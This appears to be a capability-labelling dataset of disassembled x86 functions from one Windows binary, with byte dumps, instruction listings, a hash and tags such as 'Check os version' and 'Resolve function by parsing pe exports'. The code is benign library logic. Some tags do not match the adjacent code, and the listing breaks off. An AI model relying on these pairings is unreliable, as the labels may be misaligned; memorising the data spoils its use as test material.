5589e58d6424f453565789c789d6894df88b45088945f4c745fc0000000031c068c00745005568a042410064ff306489206a006a005657e8c40dfbff89c385db7e2e8d53ff8d45fce893adfbff83fb017e0e538b45fc505657e8a20dfbff89c38b4df48b45fc6631d2e822a5fbffeb0b8b45f48b55f8e87581fbff31d25883c40c64890289e8e865ffffff5f5e5b89ec5dc20400
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0xc]",
"push ebx",
"push esi",
"push edi",
"mov edi, eax",
"mov esi, edx",
"mov dword [ebp - 8], ecx",
"mov eax, dword [ebp + 8]",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 4], 0",
"xor eax, eax",
"push fcn.004507c0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push 0",
"push 0",
"push esi",
"push edi",
"call sub.kernel32.dll_GetLocaleInfoW",
"mov ebx, eax",
"test ebx, ebx",
"jle 0x450840",
"lea edx, [ebx - 1]",
"lea eax, [ebp - 4]",
"call fcn.0040b5b0",
"cmp ebx, 1",
"jle 0x450830",
"push ebx",
"mov eax, dword [ebp - 4]",
"push eax",
"push esi",
"push edi",
"call sub.kernel32.dll_GetLocaleInfoW",
"mov ebx, eax",
"mov ecx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 4]",
"xor dx, dx",
"call fcn.0040ad60",
"jmp 0x45084b",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 8]",
"call fcn.004089c0",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.004507c0",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 4"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x450c50
|
[
"Get geographical location"
] |
5589e58d6424f05356c745f00000000031c068400c45005568a042410064ff3064892031db8d760083c3018d049d8c5b5d0031d2e8377dfbffc7049dac5b5d00ffffffff83fb077cdfe8a20afbff89c66a0b8d45f450680b10000056e89f08fbff85c07e4f8d76006a018d45f0508d45f46631c9ba0a000000e8e286fbff8b45f0ba01000000e8e560ffff89c383e80383f803731f6a045356b8200b450050e87c08fbff6a035356b8b00b450050e86d08fbff9031c05a83c40c64891089e8e82cffffff5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"push ebx",
"push esi",
"mov dword [ebp - 0x10], 0",
"xor eax, eax",
"push fcn.00450c40",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"xor ebx, ebx",
"lea esi, [esi]",
"add ebx, 1",
"lea eax, [ebx*4 + 0x5d5b8c]",
"xor edx, edx",
"call fcn.004089c0",
"mov dword [ebx*4 + 0x5d5bac], 0xffffffff",
"cmp ebx, 7",
"jl 0x450c78",
"call sub.kernel32.dll_GetThreadLocale",
"mov esi, eax",
"push 0xb",
"lea eax, [ebp - 0xc]",
"push eax",
"push 0x100b",
"push esi",
"call sub.kernel32.dll_GetLocaleInfoA",
"test eax, eax",
"jle 0x450d04",
"lea esi, [esi]",
"push 1",
"lea eax, [ebp - 0x10]",
"push eax",
"lea eax, [ebp - 0xc]",
"xor cx, cx",
"mov edx, 0xa",
"call fcn.004093b0",
"mov eax, dword [ebp - 0x10]",
"mov edx, 1",
"call fcn.00446dc0",
"mov ebx, eax",
"sub eax, 3",
"cmp eax, 3",
"jae 0x450d04",
"push 4",
"push ebx",
"push esi",
"mov eax, 0x450b20",
"push eax",
"call sub.kernel32.dll_EnumCalendarInfoA",
"push 3",
"push ebx",
"push esi",
"mov eax, 0x450bb0",
"push eax",
"call sub.kernel32.dll_EnumCalendarInfoA",
"nop",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00450c40",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x451350
|
[
"Query environment variable"
] |
5589e58d6424ec53565789c38955ecc745fc00000000c745f800000000c745f000000000c745f40000000031c068201345005568a042410064ff306489208b45ec31d2e8789bfbffe85300fbff89c789fe8d55f889d8e8d5b7ffffe9780000008d55fc89f0e8069bfbff8b55fcb901000000b03de8c7a5fbff89c38d45f0508d4bff8b45fcba01000000e851a3fbff8b45f08d55f4e896b7ffff8b45f48b55f8e87ba1fbff85c0751fff75ec8b45fc85c074038b40fc29d889c18d53018b45fce81ba3fbffeb1889f0e88133fbffd1e001f083c00289c666813e0000758157e8cbfffaff31c05a83c40c64891089e8e8dbfeffff5f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x14]",
"push ebx",
"push esi",
"push edi",
"mov ebx, eax",
"mov dword [ebp - 0x14], edx",
"mov dword [ebp - 4], 0",
"mov dword [ebp - 8], 0",
"mov dword [ebp - 0x10], 0",
"mov dword [ebp - 0xc], 0",
"xor eax, eax",
"push fcn.00451320",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 0x14]",
"xor edx, edx",
"call fcn.0040af10",
"call sub.kernel32.dll_GetEnvironmentStringsW",
"mov edi, eax",
"mov esi, edi",
"lea edx, [ebp - 8]",
"mov eax, ebx",
"call fcn.0044cb80",
"jmp 0x451428",
"lea edx, [ebp - 4]",
"mov eax, esi",
"call fcn.0040aec0",
"mov edx, dword [ebp - 4]",
"mov ecx, 1",
"mov al, 0x3d",
"call fcn.0040b990",
"mov ebx, eax",
"lea eax, [ebp - 0x10]",
"push eax",
"lea ecx, [ebx - 1]",
"mov eax, dword [ebp - 4]",
"mov edx, 1",
"call fcn.0040b730",
"mov eax, dword [ebp - 0x10]",
"lea edx, [ebp - 0xc]",
"call fcn.0044cb80",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 8]",
"call fcn.0040b570",
"test eax, eax",
"jne 0x451418",
"push dword [ebp - 0x14]",
"mov eax, dword [ebp - 4]",
"test eax, eax",
"je 0x451406",
"mov eax, dword [eax - 4]",
"sub eax, ebx",
"mov ecx, eax",
"lea edx, [ebx + 1]",
"mov eax, dword [ebp - 4]",
"call fcn.0040b730",
"jmp 0x45142f",
"mov eax, esi",
"call fcn.004047a0",
"shl eax, 1",
"add eax, esi",
"add eax, 2",
"mov esi, eax",
"cmp word [esi], 0",
"jne 0x4513b0",
"push edi",
"call sub.kernel32.dll_FreeEnvironmentStringsW",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00451320",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x451460
|
[
"Check os version"
] |
5589e58da4246cffffffc705f05b5d0000000000c7856cffffff940000008d856cffffff50e8a600fbff8b857cffffffa3505a5d008b8570ffffffa3605a5d008b8574ffffffa3705a5d008b8578ffffffa3805a5d00ba915a5d008d4580b980000000e85821fbff8d4580e8b032fbffa2905a5d00b850ed580050e810fcfaffa3005c5d0085c07417b85ced580050ff35005c5d00e886fcfaffa3f05b5d0090833d605a5d0006730bc705f07656000000000090833d605a5d00067213833d705a5d0001720ac705007756000200000089ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x94]",
"mov dword [0x5d5bf0], 0",
"mov dword [ebp - 0x94], 0x94",
"lea eax, [ebp - 0x94]",
"push eax",
"call sub.kernel32.dll_GetVersionExA",
"mov eax, dword [ebp - 0x84]",
"mov dword [0x5d5a50], eax",
"mov eax, dword [ebp - 0x90]",
"mov dword [0x5d5a60], eax",
"mov eax, dword [ebp - 0x8c]",
"mov dword [0x5d5a70], eax",
"mov eax, dword [ebp - 0x88]",
"mov dword [0x5d5a80], eax",
"mov edx, 0x5d5a91",
"lea eax, [ebp - 0x80]",
"mov ecx, pe_nt_image_headers32",
"call fcn.00403620",
"lea eax, [ebp - 0x80]",
"call fcn.00404780",
"mov byte [0x5d5a90], al",
"mov eax, 0x58ed50",
"push eax",
"call sub.kernel32.dll_GetModuleHandleA",
"mov dword [0x5d5c00], eax",
"test eax, eax",
"je 0x451500",
"mov eax, 0x58ed5c",
"push eax",
"push dword [0x5d5c00]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d5bf0], eax",
"nop",
"cmp dword [0x5d5a60], 6",
"jae 0x451514",
"mov dword [0x5676f0], 0",
"nop",
"cmp dword [0x5d5a60], 6",
"jb 0x451530",
"cmp dword [0x5d5a70], 1",
"jb 0x451530",
"mov dword [0x567700], 2",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x486650
|
[
"Resolve function by parsing pe exports"
] |
5589e58da424b0fdffff538945f48955fc894df8c785b0feffff00000000c785b4feffff00000000c745b800000000c745cc0000000031c068206648005568a042410064ff306489208b45f4e81f1a0000668945e48b45fc668b00663b45e40f869f0100008b45f48b401885c00f84c900000083e8010f85880100008d45cce82cd4f7ff6a00b8e0b159008945bc8b45fc0fb70068ff0000008d8db8feffffbaffffffffe8d7e6f7ff8d4db86631d28d85b8feffffe8362bf8ff30c96631d28d45b8e8f938f8ff8b45b88945c0b814b259008945c40fb745e468ff0000008d8db8feffffbaffffffffe892e6f7ff8d8db4feffff6631d28d85b8feffffe8ee2af8ff30c96631d28d85b4feffffe8ae38f8ff8b85b4feffff8945c88d55bcb9030000008d45cce8d525f8ff8b55cc8b45f4e83ae6ffffe9c900000066817de430750f83bc0000008d45cce860d3f7ff6a00b8e0b159008945bc8b45fc0fb70068ff0000008d8db8feffffbaffffffffe80be6f7ff8d8db4feffff6631d28d85b8feffffe8672af8ff30c96631d28d85b4feffffe82738f8ff8b85b4feffff8945c0b814b259008945c40fb745e468ff0000008d8db8feffffbaffffffffe8bde5f7ff8d4db86631d28d85b8feffffe81c2af8ff30c96631d28d45b8e8df37f8ff8b45b88945c88d55bcb9030000008d45cce80925f8ff8b55cc8b45f4e86ee5ffff89f68b45fc668b55e46689108b45fc668b00663dfe000f825a100000662dfe000f8438020000662d01000f8466020000662d01000f842c030000662d01000f8436030000662d01000f8440030000662d01000f84d6030000662d03000f84e0040000662d01000f847a050000662d01000f844c060000662d01000f8456060000662d01000f8460060000662d03000f841a070000662d01000f8434070000662d01000f844e070000662d01000f8468070000662d01000f8482070000662d01000f8490070000662d03000f84b6080000662d01000f84c0080000662d01000f845a090000662d01000f84bc0f0000662d01000f84b20f0000662d01000f8464090000662d01000f8482090000662d01000f84a0090000662d01000f84360a0000662d03000f84800f0000662d01000f84760f0000662d01000f846c0f0000662d01000f84620f0000662d05000f84480a0000662d01000f841a0b0000662d08000f84280c0000662d01000f84420c0000662d09000f845c0c0000662d01000f84760c0000662d01000f84900c0000662d03000f84520d0000662d02000f845c0d0000662d01000f848a0d0000662d01000f84b80d0000662d01000f84e60d0000662d0d000f84140e0000662d09000f84d60e0000662da5000f84cc0e0000662d01000f84c20e0000662d01000f84b80e0000662d01000f84ae0e0000662d02000f84a40e0000662d01000f849a0e0000662d01000f84900e0000662d01000f84860e0000662d01000f847c0e0000662d09000f84720e0000662daa000f84680e0000662ddc7f0f84020e0000662ddb040f84540e0000e91b0e00008b45f4e8c80e00008945e08b55f88b45e083e0010f95424e8b55f88b45e083e0020f95424d8b55f88b45e083e0040f95424ce9150e00008b45f4e8900e00008945e08b45f8c6404e008b45f8c6404d008b45f8c6404c008b45e083f801723883e8010f84e30d000083e801741283e8017419eb238b45f8c6404e01e9c00d00008b45f8c6404d01e9b40d00008d45cce8b0cff7ff6a008b45e031d25250b9ff0000008d95b8feffffb8ffffffffe842e3f7ff8d8db0feffff6631d28d85b8feffffe8be26f8ff30c96631d28d85b0feffffe87e34f8ff8b8db0feffffba28b259008d45cce81b1ff8ff8b55cc8b45f4e810e2ffffe9470d00008b45f4e8c00d00008b55f8894250e9310d00008b45f4e8ac0d00008b55f8894248e91d0d000089e8e8390d00008b55f88942108d45d4508b45f88b50108d4dd88b45f4e8be19000031c068006648005568a042410064ff306489208b45d48945b48d45b450baa8c559008b45f883c014b901000000e8dc5df8ff8b45d483e80185c07c2ac745d0ffffffff8d76008345d0018b55f88b4a148b5dd08b55d8668b145a668914593b45d07fe38d760031d25883c40c64890289e8e888f9ffffe97f0c00008b45f4e8f80c00008945e083f8010f827c00000083e80a0f86e70000002df47f00000f84dc00000083e8050f84d300000083e8020f84ca00000083e8240f84c100000083e856724883e8030f86b300000083e80a723a83e8010f86a500000083e825722c83e8010f86970000002db20600000f848c00000083e80f721383e8010f867e00000083e823750590eb768d85b0feffffe8e5cdf7ff6a008b45e031d28945b08955b4ff75b4ff75b0b9ff0000008d95b0fdffffb8ffffffffe86de1f7ff8d4dcc6631d28d85b0fdffffe8ec24f8ff30c96631d28d45cce8af32f8ff8b4dccba58b259008d85b0feffffe84c1df8ff8b95b0feffff8b45f4e83ee0ffff89f68b45f88b55e0895024e96a0b00008b45f4e8e40b00008945e03dffff00000f867e0000008d85b0feffffe84bcdf7ff6a008b45e031d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe8c7e0f7ff8d4dcc6631d28d85b8feffffe84624f8ff30c96631d28d45cce80932f8ff8b4dccba88b259008d85b0feffffe8a61cf8ff8b95b0feffff8b45f4e898dfffff8b45f88b55e0895068e9c60a00008b45f4e8400b00008945e083f801723883e8010f84af00000083e8010f84a600000083e8010f849d000000eb1b8d85b0feffffe875ccf7ff6a008b45e031d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe8f1dff7ff8d4dcc6631d28d85b8feffffe87023f8ff30c96631d28d45cce83331f8ff8b4dccbac4b259008d85b0feffffe8d01bf8ff8b95b0feffff8b45f4e8c2deffff89f68b45f88b55e0899098000000e9eb0900008b45f4e8640a00008b55f889421ce9d50900008b45f4e8500a00008b55f8894218e9c10900008b45f4e83c0a00008945e083f801722c83e801740783e8017412eb208b45f8c7403c01000000e9950900008b45f8c7403c02000000e9850900008d85b0feffffe87dcbf7ff6a008b45e031d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe8f9def7ff8d4dcc6631d28d85b8feffffe87822f8ff30c96631d28d45cce83b30f8ff8b4dccbaf4b259008d85b0feffffe8d81af8ff8b95b0feffff8b45f4e8caddffff89f6e9ff0800008b45f48d95b0feffffe8420f00008b95b0feffff8b45f883c034e8a119f8ffe9d80800008b45f48d95b0feffffe81e0f00008b95b0feffff8b45f883c044e87d19f8ffe9b40800008b45f48d95b0feffffe8fa0e00008b95b0feffff8b45f883c054e85919f8ffe9900800008b45f48d95b0feffffe8d60e00008b95b0feffff8b45f883c058e83519f8ffe96c08000089e8e8890800008b55f8898284000000e9570800008b45f4e8d00800008945e083f8010f828c00000083e8010f840301000083e8010f84fa00000083e8010f84f100000083e8010f84e800000083e8010f84df00000083e8010f84d600000083e8010f84cd00000083e8010f84c4000000eb428d85b0feffffe8adc9f7ff6a008b55e031c08995a8feffff8985acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe829ddf7ff8d4dcc6631d28d85b8feffffe8a820f8ff30c96631d28d45cce86b2ef8ff8b4dccba20b359008d85b0feffffe80819f8ff8b95b0feffff8b45f4e8fadbffff89f68b45f88b55e089505ce9260700008b45f4e8a00700008b55f8894278e9110700008b45f4e88c0700008945e085c00f85810000008d85b0feffffe8f6c8f7ff6a008b45e031d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe872dcf7ff8d4dcc6631d28d85b8feffffe8f11ff8ff30c96631d28d45cce8b42df8ff8b4dccba50b359008d85b0feffffe85118f8ff8b95b0feffff8b45f4e843dbffff8d76008b55f88b45e0894274e96e06000089e8e8890600008b55f8898280000000e9570600008b45f48d55c4e87d0a00008b55f88b45c489829c0000008b45c88982a0000000e91f0600008b45f48d55c4e8550a00008b55f88b45c48982a40000008b45c88982a8000000e9f70500008b45f4e8200800008945dc83f8017c1c83e8010f847700000083e8010f846e000000eb088d85b0feffffe8c1c7f7ff6a0068ff0000008b45dc8d8db0fdffffbaffffffffe877daf7ff8d4dcc6631d28d85b0fdffffe8d61ef8ff30c96631d28d45cce8992cf8ff8b4dccba80b359008d85b0feffffe83617f8ff8b95b0feffff8b45f4e828daffff8b45f88b55dc89506ce9560500008b45f48d95b0feffffe89a0b00008b95b0feffff8b45f883c064e8f915f8ffe9300500008b45f4e88c0500008945e083f801724483e801740f83e801741a83e8017425eb338b45f8c7407001000000e9dd0400008b45f8c7407002000000e9cd0400008b45f8c7407003000000e9bd0400008d85b0feffffe8b5c6f7ff6a008b45e031d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe831daf7ff8d4dcc6631d28d85b8feffffe8b01df8ff30c96631d28d45cce8732bf8ff8b4dccbab8b359008d85b0feffffe81016f8ff8b95b0feffff8b45f4e802d9ffff89f6e93704000089e8e8510400008945e08d45d4508d4dd88b55e08b45f4e8dc10000031c068106648005568a042410064ff30648920837dd4020f847f0000008d85b0feffffe8f4c5f7ff6a008b45d431d28985a8feffff8995acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe870d9f7ff8d4dcc6631d28d85b8feffffe8ef1cf8ff30c96631d28d45cce8b22af8ff8b4dccbae8b359008d85b0feffffe84f15f8ff8b95b0feffff8b45f4e841d8ffff908b55f88b45d8668b00668942608b55f88b45d8668b4002668942628b45f8668b5060663b506272208b45f80fb740608945e08b55f8668b4262668942608b45f8668b55e06689506231d25883c40c64890289e8e838f0ffffe91f0300008b45f48d95b0feffffe8620900008b95b0feffff8b45f883c07ce8c113f8ffe9f80200008b45f48d95b0feffffe83e0900008b95b0feffff8b45f883c030e89d13f8ffe9d40200008b45f48d95b0feffffe81a0900008b95b0feffff8b45f883c00ce87913f8ffe9b00200008b45f48d95b0feffffe8f60800008b95b0feffff8b45f883c040e85513f8ffe98c0200008b45f4e80803000025ffff00008945e083f801722783e8010f849e00000083e8010f8495000000eb138d85b0feffffe849c4f7ff6a008b55e031c08995a8feffff8985acfeffffffb5acfeffffffb5a8feffffb9ff0000008d95b8feffffb8ffffffffe8c5d7f7ff8d4dcc6631d28d85b8feffffe8441bf8ff30c96631d28d45cce80729f8ff8b4dccba1cb459008d85b0feffffe8a413f8ff8b95b0feffff8b45f4e896d6ffff89f68b55f8668b45e066894228e9c001000089e8e8dd0100008b55f8894220e9ae0100008b45f4e8280200008b55f88982880000008b45f883b888000000000f858b0100008b45f4ba48b45900e842d6ffff89f6e9770100008b45f4e8f00100008b55f889828c0000008b45f883b88c000000000f85530100008b45f4ba60b45900e80ad6ffff89f6e93f01000089e8e8590100008b55f88982900000008b45f883b890000000000f851c0100008b45f4ba7cb45900e8d3d5ffff8d7600e90701000089e8e8210100008b55f88982940000008b45f883b894000000000f85e40000008b45f4ba98b45900e89bd5ffff8d7600e9cf00000089e8e8e90000008b55f8894238e9ba0000008b45f48d95b0feffffe8a20600008b95b0feffff8b45f883c02ce80111f8ffeb3b8b45f4e8f0070000668945f08b45f4e8140800008945ec8b45f4e8090800008945e866817df00000750a837dec007504837de80031c05a83c40c64891089e8e814edffff5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x250]",
"push ebx",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 4], edx",
"mov dword [ebp - 8], ecx",
"mov dword [ebp - 0x150], 0",
"mov dword [ebp - 0x14c], 0",
"mov dword [ebp - 0x48], 0",
"mov dword [ebp - 0x34], 0",
"xor eax, eax",
"push fcn.00486620",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 0xc]",
"call fcn.004880c0",
"mov word [ebp - 0x1c], ax",
"mov eax, dword [ebp - 4]",
"mov ax, word [eax]",
"cmp ax, word [ebp - 0x1c]",
"jbe 0x486854",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0x18]",
"test eax, eax",
"je 0x48678c",
"sub eax, 1",
"jne 0x486854",
"lea eax, [ebp - 0x34]",
"call fcn.00403b00",
"push 0",
"mov eax, str.Tags_must_be_in_ascending_order:_Last",
"mov dword [ebp - 0x44], eax",
"mov eax, dword [ebp - 4]",
"movzx eax, word [eax]",
"push 0xff",
"lea ecx, [ebp - 0x148]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x48]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x48]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0x48]",
"mov dword [ebp - 0x40], eax",
"mov eax, str._Next",
"mov dword [ebp - 0x3c], eax",
"movzx eax, word [ebp - 0x1c]",
"push 0xff",
"lea ecx, [ebp - 0x148]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x14c]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x14c]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0x14c]",
"mov dword [ebp - 0x38], eax",
"lea edx, [ebp - 0x44]",
"mov ecx, 3",
"lea eax, [ebp - 0x34]",
"call fcn.00408d50",
"mov edx, dword [ebp - 0x34]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"jmp 0x486854",
"cmp word [ebp - 0x1c], 0x7530",
"jae 0x486854",
"lea eax, [ebp - 0x34]",
"call fcn.00403b00",
"push 0",
"mov eax, str.Tags_must_be_in_ascending_order:_Last",
"mov dword [ebp - 0x44], eax",
"mov eax, dword [ebp - 4]",
"movzx eax, word [eax]",
"push 0xff",
"lea ecx, [ebp - 0x148]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x14c]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x14c]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0x14c]",
"mov dword [ebp - 0x40], eax",
"mov eax, str._Next",
"mov dword [ebp - 0x3c], eax",
"movzx eax, word [ebp - 0x1c]",
"push 0xff",
"lea ecx, [ebp - 0x148]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0x48]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x48]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0x48]",
"mov dword [ebp - 0x38], eax",
"lea edx, [ebp - 0x44]",
"mov ecx, 3",
"lea eax, [ebp - 0x34]",
"call fcn.00408d50",
"mov edx, dword [ebp - 0x34]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"mov esi, esi",
"mov eax, dword [ebp - 4]",
"mov dx, word [ebp - 0x1c]",
"mov word [eax], dx",
"mov eax, dword [ebp - 4]",
"mov ax, word [eax]",
"cmp ax, 0xfe",
"jb 0x4878c8",
"sub ax, 0xfe",
"je 0x486ab0",
"sub ax, 1",
"je 0x486ae8",
"sub ax, 1",
"je 0x486bb8",
"sub ax, 1",
"je 0x486bcc",
"sub ax, 1",
"je 0x486be0",
"sub ax, 1",
"je 0x486c80",
"sub ax, 3",
"je 0x486d94",
"sub ax, 1",
"je 0x486e38",
"sub ax, 1",
"je 0x486f14",
"sub ax, 1",
"je 0x486f28",
"sub ax, 1",
"je 0x486f3c",
"sub ax, 3",
"je 0x487000",
"sub ax, 1",
"je 0x487024",
"sub ax, 1",
"je 0x487048",
"sub ax, 1",
"je 0x48706c",
"sub ax, 1",
"je 0x487090",
"sub ax, 1",
"je 0x4870a8",
"sub ax, 3",
"je 0x4871d8",
"sub ax, 1",
"je 0x4871ec",
"sub ax, 1",
"je 0x487290",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4872b8",
"sub ax, 1",
"je 0x4872e0",
"sub ax, 1",
"je 0x487308",
"sub ax, 1",
"je 0x4873a8",
"sub ax, 3",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 5",
"je 0x4873ec",
"sub ax, 1",
"je 0x4874c8",
"sub ax, 8",
"je 0x4875e0",
"sub ax, 1",
"je 0x487604",
"sub ax, 9",
"je 0x487628",
"sub ax, 1",
"je 0x48764c",
"sub ax, 1",
"je 0x487670",
"sub ax, 3",
"je 0x48773c",
"sub ax, 2",
"je 0x487750",
"sub ax, 1",
"je 0x487788",
"sub ax, 1",
"je 0x4877c0",
"sub ax, 1",
"je 0x4877f8",
"sub ax, 0xd",
"je 0x487830",
"sub ax, 9",
"je 0x4878fc",
"sub ax, 0xa5",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 2",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 1",
"je 0x4878fc",
"sub ax, 9",
"je 0x4878fc",
"sub ax, 0xaa",
"je 0x4878fc",
"sub ax, 0x7fdc",
"je 0x4878a0",
"sub ax, 0x4db",
"je 0x4878fc",
"jmp 0x4878c8",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x20]",
"and eax, 1",
"setne byte [edx + 0x4e]",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x20]",
"and eax, 2",
"setne byte [edx + 0x4d]",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0x20]",
"and eax, 4",
"setne byte [edx + 0x4c]",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov dword [ebp - 0x20], eax",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0x4e], 0",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0x4d], 0",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0x4c], 0",
"mov eax, dword [ebp - 0x20]",
"cmp eax, 1",
"jb 0x486b48",
"sub eax, 1",
"je 0x4878fc",
"sub eax, 1",
"je 0x486b30",
"sub eax, 1",
"je 0x486b3c",
"jmp 0x486b48",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0x4e], 1",
"jmp 0x4878fc",
"mov eax, dword [ebp - 8]",
"mov byte [eax + 0x4d], 1",
"jmp 0x4878fc",
"lea eax, [ebp - 0x34]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 0x20]",
"xor edx, edx",
"push edx",
"push eax",
"mov ecx, 0xff",
"lea edx, [ebp - 0x148]",
"mov eax, 0xffffffff",
"call fcn.00404eb0",
"lea ecx, [ebp - 0x150]",
"xor dx, dx",
"lea eax, [ebp - 0x148]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0x150]",
"call fcn.0040a010",
"mov ecx, dword [ebp - 0x150]",
"mov edx, str.SubFileType_expected__but_found",
"lea eax, [ebp - 0x34]",
"call fcn.00408ac0",
"mov edx, dword [ebp - 0x34]",
"mov eax, dword [ebp - 0xc]",
"call fcn.00484dc0",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x50], eax",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x48], eax",
"jmp 0x4878fc",
"mov eax, ebp",
"call fcn.00487920",
"mov edx, dword [ebp - 8]",
"mov dword [edx + 0x10], eax",
"lea eax, [ebp - 0x2c]",
"push eax",
"mov eax, dword [ebp - 8]",
"mov edx, dword [eax + 0x10]",
"lea ecx, [ebp - 0x28]",
"mov eax, dword [ebp - 0xc]",
"call fcn.004885c0",
"xor eax, eax",
"push fcn.00486600",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 0x2c]",
"mov dword [ebp - 0x4c], eax",
"lea eax, [ebp - 0x4c]",
"push eax",
"mov edx, 0x59c5a8",
"mov eax, dword [ebp - 8]",
"add eax, 0x14",
"mov ecx, 1",
"call fcn.0040ca10",
"mov eax, dword [ebp - 0x2c]",
"sub eax, 1",
"test eax, eax",
"jl 0x486c68",
"mov dword [ebp - 0x30], 0xffffffff",
"lea esi, [esi]",
"add dword [ebp - 0x30], 1",
"mov edx, dword [ebp - 8]",
"mov ecx, dword [edx + 0x14]",
"mov ebx, dword [ebp - 0x30]",
"mov edx, dword [ebp - 0x28]",
"mov dx, word [edx + ebx*2]",
"mov word [ecx + ebx*2], dx",
"cmp eax, dword [ebp - 0x30]",
"jg 0x486c48",
"lea esi, [esi]",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.00486600",
"jmp 0x4878fc",
"mov eax, dword [ebp - 0xc]",
"call fcn.00487980",
